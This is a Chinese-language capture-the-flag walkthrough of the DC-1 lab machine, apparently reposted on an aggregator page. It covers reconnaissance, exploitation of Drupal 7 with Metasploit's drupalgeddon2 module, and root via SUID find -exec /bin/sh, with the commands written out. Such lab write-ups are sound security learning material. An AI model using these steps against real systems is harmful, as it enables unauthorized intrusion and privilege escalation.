zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
App.js和App.css(用于移动应用的js和css)
cookie和session使用
html实现返回上一页的几种方法(javaScript:history.go(-1);)
sublime找到成对标签(Ctrl+Shift+")
Java NIO框架Netty课程(一) – Hello Netty
信息增益的特征选择方法
Java线程学习笔记(两) 线程异常处理
薏米红豆粥的功效和实践演示
文件翻译002片:Process Monitor帮助文档(Part 2)
Spring MVC 3 深入总结
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
分区表在安装系统(MBR)丢失或损坏
ArcGIS课程:表面数据转换成矢量数据
Cts分析框架(4)-添加任务
工作日志2014-08-27
CString——Left、Right、Find、ReverseFind
accept函数
单点登录SSO的实现原理
android之PackageManager简单介绍
Oracle性能分析11:系统统计信息
JAVA 长整型转换为IP地址的方法
热门文章
刚学unity3d,跟着仿作了flappy bird,记下一些琐碎的心得!
中国软件开发project师之痛
使用Jquery+EasyUI进行框架项目开发案例解说之中的一个---员工管理源代码分享
jquery_mobile.js+html5+css3打造手机平板等各种效果
thinkphp事务不能回滚的问题(因为助手函数)
复选框传多值问题(在页面用数组方式接收值)
php实现运气模型(命运随机,克服困难)
实现span设置宽度(行内元素本来不支持调宽度高度这些样式)(变成行内块元素:display:inline-block;)
php中嵌套html代码和html代码中嵌套php方式
数据库怎么设计多对多的数据表
Copyright © 2011-2022 走看看